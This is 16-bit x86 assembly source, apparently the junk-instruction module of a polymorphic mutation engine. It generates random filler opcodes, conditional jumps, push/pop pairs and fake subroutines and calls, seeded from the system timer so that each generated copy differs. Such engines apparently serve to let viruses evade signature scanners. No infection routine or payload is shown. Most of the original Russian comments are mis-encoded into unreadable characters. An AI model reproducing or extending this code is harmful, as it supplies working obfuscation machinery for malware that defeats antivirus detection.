
;  ଠ ᫮   REG/MEM trash
;
;  WD = 00 - W  D 		     0,1 Wbit & Dbit
;	01 - W=0,1 D 
;	10 - W=0,1 D=1
;	11 - W=0,1 D=0,1
;
;  TR = 0 -  ஢  REG	     2	 TestREG
;	1 - ஢  REG
;
;					     3	 TestREG/MEM
;  TRM = 0 -    REG/MEM
;	 1 -   ॣ
;
;  MemOnly = 0 - ந쭮		     4	 MemOnly
;	     1 - ⮫쪮  
;
;  PLCMD = 00 -  ⥫쭮    5,6 PLaceCoMmanD
;	   01 -  'e 			 ⮯
;	   10 -  ModeRM
;
;  ImmF = 0 -  ⥫쭮 ࠭    7   Immediate
;	  1 -  ⥫ ࠭
;
;					     8,9,10
;					     ⥫쭠 
;					     11,12,13
;					     ⥫ 
;
;  KillAD = 0 -   AX  DX	     14  KillAX,DX
;	    1 -  AX  DX

Wbit		equ	0
WDbit		equ	00000011b
TR		equ	00000100b
TRM		equ	00001000b
MemOnly 	equ	00010000b
CMDinCOP	equ	00100000b
CMDinRM 	equ	01000000b
ImmF		equ	10000000b
;		High Byte
XtraCMD 	equ	00000111b
XtraCOP 	equ	00111000b
KillAD		equ	01000000b

RMTAB		equ	$

db	10001010b,10b+TR,0			; MOV REG,REG/MEM
db	10000110b,01b+TR+TRM,0			; XCHG REG,REG
db	10001101b,00b+TR+MemOnly,0		; LEA REG,MEM
db	00000010b,10b+TR+CMDinCOP,111b		; ARCMD REG,REG/MEM
db	00111000b,11b,0 			; CMP REG,REG/MEM
db	10000100b,01b,0 			; TEST REG,REG/MEM
db	11000110b,01b+TR+CMDinRM+TRM+ImmF,0	; MOV REG,Imm8/16
db	10000000b,01b+TR+CMDinRM+TRM+ImmF,111b	; ARCMD REG,Imm8/16
db	11110110b,01b+TR+CMDinRM+ImmF,0 	; TEST REG/MEM,Imm8/16
db	11111110b,01b+TR+CMDinRM+TRM,1		; INC/DEC REG
db	11110110b,01b+TR+CMDinRM+TRM,1+010000b	; NOT/NEG REG
db	11110110b,01b+TR+CMDinRM,1+100000b+KillAD    ; MUL/IMUL REG/MEM
db	10001100b,00b+TR+CMDinRM+TRM,11b	; MOV REG,SREG
db	11010000b,01b+TR+CMDinRM+TRM,111b	; SHIFT REG,1
db	11010010b,01b+TR+CMDinRM+TRM,111b	; SHIFT REG,CL

; 砭 :
;		 ᤢ  १  imm8
;		 ७ '   ࠧ  ARCMD , S=0

ENDRMTAB	equ	$

;  offset'  SUB'
SUBOFFS 	dw	0FFFFh
		dw	0FFFFh
		dw	0FFFFh
		dw	0FFFFh

;  ⮣ 

RotF		equ	00000010b
KillAX		equ	00001000b
SmplyCMD	equ	01110000b

SimplyTAB	equ	$

db	10110000b,01b+TR+ImmF			; MOV REG,Imm8/16
db	10010000b,00b+TR+KillAX 		; XCHG AX,REG
db	01000000b,00b+TR+RotF+10000b		; INC/DEC REG
db	10100001b,00b+KillAX+ImmF		; MOV AX,MEM
db	00000100b,01b+KillAX+RotF+ImmF+SmplyCMD ; ARCMD AL/AX,Imm8/16
db	10101000b,01b+ImmF			; TEST AL/AX,Imm8/16
db	00100111b,00b+KillAX+RotF+110000b	; DAA/DAS/AAA/AAS
db	11111000b,00b+1010000b			; STI,CLI,STD,CLD,STC,CLC
db	11110101b,00b				; CMC
db	10011000b,00b+KillAX			; CBW
db	11010111b,00b+KillAX			; XLAT
db	11001100b,00b				; INT 3
db	10011110b,00b+KillAX+10000b		; SAHF,LAHF
db	10010000b,00b				; NOP
db	00100110b,00b+RotF+110000b		; ES/CS/SS/DS

SimplyEND	equ	$

; 砭 :
;		      
;		  AAM,AAD
;		 MOV AL,MEM

;   楤

TRCMDs		dw	offset SimplyTRASH
		dw	offset SUBROUTINE
		dw	offset CALLtoSUB
		dw	offset RMTRASH
		dw	offset JUMPTRASH
		dw	offset PUSHPOPTRASH
TREND		equ	$
;----------------------------------------------------------------------------

GETVAL		proc
;		 祭  砩 
		call	RND
		shl	dl,1
		movzx	bx,dl
		mov	ax,[si+bx]
		ret
GETVAL		endp
;-------------------
GETTRASHREG	proc
		bt	bx,Wbit       ; ⨭ Wbit
		cmc
		call	GETFREEREG    ; ६  ॣ
		call	FREEREG       ;   砥    -
				      ;   
		ret
GETTRASHREG	endp
;-------------------
AddImmediate	proc
;  ।⢥ ࠭
		test	bl,ImmF
		jz	ExitImmed

		in	al,40h
		stosb
		bt	bx,Wbit
		jnc	ExitImmed
		in	al,40h
		stosb
ExitImmed:
		ret
AddImmediate	endp
;-------------------
AddXtraCMD	PROC
;  ⥫쭮 
		mov	dl,bh
		and	dl,XtraCOP
		or	al,dl

		mov	dl,bh	      ; 塞 ⥫ 
		and	dl,XtraCMD
		call	RND
		shl	dl,3	      ;   3
		or	al,dl
		ret
AddXtraCMD	ENDP
;-------------------
MAKE_WDbits	PROC
; Enter : Bl - flags
; Exit	: Dl - WDbits
;	  Bl - Real WDbits

		mov	cl,bl	       ; CL -  WDbits
		and	bl,NOT WDbit   ; ᨬ  WDbits
		and	cl,WDbit
		pushf
		push	ax
;			    RND bits
		mov	dl,10100100b
WDbits		equ	$ - 1
		shl	cl,1
		shr	dl,cl
		and	dl,3

		in	al,40h
		and	al,11010100b
		xor	byte ptr [WDbits],al

		pop	ax
		or	al,dl	       ; ⨭  W  D
		or	bl,dl	       ;  䫠    WD
				       ;  ⨭ 祭
		popf
		jnz	ExitWDbits
		inc	bx	       ; ᫨ Wbit    
				       ;    㬮砭 W=1
ExitWDbits:
		ret
MAKE_WDbits	ENDP
;-------------------
MAKE_ModeRM	PROC
; Enter : AL - ModeRM 
;	  BX - status  RealWD

		test	bl,TR
		jnz	COPorREG

		mov	dl,7	      ;  㥬 ॣ
		call	RND
		jmp	AddREG
COPorREG:
		test	bl,CMDinRM
		jz	AddFreeREG

		call	AddXtraCMD    ;  
		jmp	REGMEM
AddFreeREG:
		call	GETTRASHREG    ; ६  ॣ
AddREG:
		shl	dl,3	      ; + REG
		or	al,dl
REGMEM:
		test	bl,TRM
		jnz	TestRM

		mov	dl,3	     ; Mode
		test	bl,MemOnly   ; Mode!=11b - ⮫쪮  
		jz	falce
		dec	dl
falce:
		call	RND
		mov	dh,dl	     ; DH=Mode

		mov	dl,7	     ; DL=REG/MEM
		call	RND
		jmp	RMdone
TestRM:
		call	GETTRASHREG
		mov	dh,3
RMdone:
		ror	dh,2
		or	al,dh	      ; + Mode
		or	al,dl	      ; + RM
		stosb

		test	dh,dh		 ; ᭠  'a
		jnz	NextMode
		cmp	dl,00000110b	 ;  ࠭ MEM
		je	Index16

NextMode:
		cmp	dh,01000000b	 ; ᭠ + imm8
		je	Index8
		cmp	dh,10000000b	 ; ஢ 
		jne	ExitModeRM
Index16:				 ; ᭠ + imm16
		in	al,40h
		and	al,7Fh
		stosb
Index8:
		in	al,40h
		and	al,7Fh
		stosb
ExitModeRM:
		ret
MAKE_ModeRM	ENDP
;-------------------
FinishJP	proc
		push	ax
		test	al,JRQ
		jz	FinishPP
		call	JUMPTRASH	   ;஥ JMP
FinishPP:
		pop	ax
		push	ax
		test	al,PRQ
		jz	JPisFinished
		call	PUSHPOPTRASH	   ;஥ PUSH/POP
JPisFinished:
		pop	ax
		ret
FinishJP	endp
;-------------------
JUMPTRASH	PROC
;		  ᫮ 室

		test	[PH_FLAGS],JRQ
		jnz	AddRel8toJMP	      ;稬 Jump

		mov	al,01110000B	      ;Jxx Rel8

		mov	dl,0Fh
		call	RND

		or	al,dl	; Jump'a ⮢
		stosb

		mov	word ptr [JmpPLACE],di	 ;   Relative

		inc	di
		or	[PH_FLAGS],JRQ	;⠭ Jump Request
		ret
AddRel8toJMP:
		mov	ax,di
		mov	bx,1234h
JmpPLACE	equ	$ - 2
		sub	ax,bx
		dec	al
		mov	es:[bx],al

		xor	[PH_FLAGS],JRQ ;ᨬ   襭 Jmp'a
		ret
JUMPTRASH	ENDP
;-------------------
PUSHPOPTRASH	PROC
;		 push' pop'

		test	[PH_FLAGS],JRQ	; ᫨  䫠  jmp'a ,
					;  PUSH/POP 
		jnz	PPExit

		mov	al,01010000b	; PUSH/POP

		test	[PH_FLAGS],PRQ	; PUSH/POP request is set ?
		jnz	MakePOP
MakePUSH:
		and	[PH_FLAGS],not PRQ

		mov	dl,7		; RND ॣ  SREG
		call	RND
		call	DROPCOIN	; PUSH reg  PUSH Sreg
		jz	DonePUSHPOP

		mov	al,00000110b	; PUSH Sreg
		and	dl,00000011b
		shl	dl,3
		jmp	DonePUSHPOP
MakePOP:
		or	al,00001000b	; POP Reg
		clc
		call	GETFREEREG
		call	FREEREG
		or	[PH_FLAGS],PRQ
DonePUSHPOP:
		or	al,dl
		stosb
		xor	[PH_FLAGS],PRQ
PPExit:
		ret
PUSHPOPTRASH	ENDP
;-------------------
SUBROUTINE	PROC

		mov	al,[PH_FLAGS]

		test	al,SRQ		 ; SRQ ⠭ ?
		jnz	FinishSUB

		test	al,JRQ or PRQ	 ;   楤
		jnz	SUBExit 	 ; ᫨ JRQ,PRQ=1

		or	al,SRQ		 ; ⠭ SUB request
		and	al,not CRQ	 ;    CALL'

		mov	[PH_FLAGS],al

		mov	al,0E9h 	 ; JMP Relative 8 bit
		stosb
		mov	word ptr [JMPovrSUB],di
		inc	di
		inc	di

		call	RMTRASH 	; + 쪮 
		call	SimplyTRASH

		mov	bx,0000b
SubPtr		equ	$ - 2

		mov	[bx+offset SUBOFFS],di	; ᨬ  楤
		inc	bx			;  ⠡ ᬥ饭  SUB'
		inc	bx
		and	bx,00000111b		; ⠡  4 ५譮
		mov	word ptr [SubPtr],bx
		jmp	SUBExit
FinishSUB:
		call	FinishJP	; 稬 JMP  PUSH/POP 
					; (᫨  )
		call	SimplyTRASH
		call	RMTRASH

		mov	al,0C3h
		stosb

		mov	bx,0000h
JMPovrSUB	equ	$ - 2
		mov	ax,di
		sub	ax,bx
		dec	ax
		dec	ax
		mov	es:[bx],ax
		xor	[PH_FLAGS],SRQ
SUBExit:
		ret
SUBROUTINE	ENDP
;-------------------
CALLtoSUB	PROC

		in	al,40h
		cmp	al,80h
		jc	DontMakeCALL

		test	[PH_FLAGS],CRQ or SRQ	 ; ᫨  祭
		jnz	DontMakeCALL		 ;   SUB'⨭
						 ;  CALL' 
						 ;  ࠧ襭  室
		mov	al,0E8h
		stosb

NextSubroutine:
		mov	dl,00000011b	  ; 4 offset'a  CALL'
		mov	si,offset SUBOFFS
		call	GETVAL
		inc	ax
		jz	NextSubRoutine

		sub	ax,di
		sub	ax,3
		stosw
DontMakeCALL:
		ret
CALLtoSUB	ENDP
;-------------------
RMTRASH 	PROC

		mov	dl,(ENDRMTAB-RMTAB)/3-1
		call	RND

		xchg	al,dl
		mov	dl,3
		mul	dl

		movzx	bx,al	       ; Index

		mov	al,[bx+offset RMTAB]	 ; Load Code Operation
		mov	bx,[bx+offset RMTAB+1]	 ; Load Status Word

		test	bh,KillAD
		jz	SimplyCMD      ;    AX,DX ?

		test	[REG_USED],00000101b ;    ?
		jnz	ExitRMtrash
SimplyCMD:
		call	MAKE_WDbits    ;   W  D

		test	bl,CMDinCOP    ;  ⥫쭠  ?
		jz	OneCommand
		call	AddXtraCMD
OneCommand:
		stosb
		xor	al,al	       ;  ModeRM
		call	MAKE_ModeRM
		call	AddImmediate
ExitRMtrash:
		ret
RMTRASH 	ENDP
;-------------------
SimplyTRASH	proc

		mov	dl,(SimplyEND - SimplyTAB)/2-1
		mov	si,offset SimplyTAB	    ; AL - COP
		call	GETVAL			    ; AH - StatByte

		test	ah,KillAX
		jz	GoodCMD      ;    AX ?

		test	[REG_USED],00000001b ;    ?
		jnz	ExitSimply
GoodCMD:
		mov	bl,ah

		mov	dh,RotF 	; 뤥  RotF
		and	dh,bl
		xor	bl,dh

		mov	bh,al
		xor	al,al
		call	Make_WDbits
		or	bl,dh		; ⠭ ⭮  RotF

		test	bl,TR
		jz	DontREG

		shl	al,3
		or	al,bh

		call	GETTRASHREG	; ६  ॣ
		or	al,dl
		jmp	AddCMD
DontREG:
		or	al,bh
AddCMD:
		mov	dl,bl
		and	dl,SmplyCMD
		ror	dl,4
		call	RND
		test	bl,RotF
		jz	DontRot
		shl	dl,3
DontRot:
		or	al,dl
		stosb
		call	AddImmediate
ExitSimply:
		ret
SimplyTRASH	endp
;-------------------
TRCHAIN 	proc
		pusha

		mov	dl,8	 ;  8  16  
		call	RND
		add	dl,8
		movzx	cx,dl
AddTRCommand:
		push	cx

		mov	si,offset TRCMDs   ; ᨢ  楤
		mov	dl,(TREND-TRCMDs)/2-1
		call	GETVAL		   ; 쬥 offset
		call	ax		   ; 맮

		pop	cx
		loop	AddTRCommand

		mov	al,[PH_FLAGS]
		call	FinishJP	   ; 稬 JMP  PUSH/POP trash

		test	al,SRQ
		jz	ExitTRchain
		call	SUBROUTINE	   ; 稬 SUB'⨭
		call	RMTRASH
ExitTRchain:
		pop	ax		   ;   祭
		push	di
		popa
		ret
TRCHAIN 	endp
